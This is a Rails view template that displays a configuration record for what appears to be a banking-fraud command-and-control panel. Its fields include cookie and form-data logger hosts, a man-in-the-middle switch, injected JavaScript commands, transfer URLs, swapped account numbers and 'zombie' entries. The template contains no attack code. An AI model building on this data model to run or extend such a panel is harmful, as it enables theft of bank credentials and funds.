<p id="notice"><%= notice %></p>

<p>
  <b>Balancepage:</b>
  <%= @ccconfig.balancepage %>
</p>

<p>
  <b>Checksslvar:</b>
  <%= @ccconfig.checksslvar %>
</p>

<p>
  <b>Cookieloggerhost:</b>
  <%= @ccconfig.cookieloggerhost %>
</p>

<p>
  <b>Loginhost:</b>
  <%= @ccconfig.loginhost %>
</p>

<p>
  <b>Cookieloggingenabled:</b>
  <%= @ccconfig.cookieloggingenabled %>
</p>

<p>
  <b>Enablemitm:</b>
  <%= @ccconfig.enablemitm %>
</p>

<p>
  <b>Jscommandid:</b>
  <%= @ccconfig.jscommandid %>
</p>

<p>
  <b>Jscommand:</b>
  <%= @ccconfig.jscommand %>
</p>

<p>
  <b>Logoutpostdata:</b>
  <%= @ccconfig.logoutpostdata %>
</p>

<p>
  <b>Modifyurl:</b>
  <%= @ccconfig.modifyurl %>
</p>

<p>
  <b>Myaccount:</b>
  <%= @ccconfig.myaccount %>
</p>

<p>
  <b>Newaccount:</b>
  <%= @ccconfig.newaccount %>
</p>

<p>
  <b>Origaccount:</b>
  <%= @ccconfig.origaccount %>
</p>

<p>
  <b>Origmsg:</b>
  <%= @ccconfig.origmsg %>
</p>

<p>
  <b>Postdataloggerhost:</b>
  <%= @ccconfig.postdataloggerhost %>
</p>

<p>
  <b>Postenabled:</b>
  <%= @ccconfig.postenabled %>
</p>

<p>
  <b>Cookielist:</b>
  <%= @ccconfig.cookielist %>
</p>

<p>
  <b>Transferurl:</b>
  <%= @ccconfig.transferurl %>
</p>

<p>
  <b>Uploadpath:</b>
  <%= @ccconfig.uploadpath %>
</p>

<p>
  <b>Zombie:</b>
  <%= @ccconfig.zombie %>
</p>


<%= link_to 'Edit', edit_ccconfig_path(@ccconfig) %> |
<%= link_to 'Back', ccconfigs_path %>
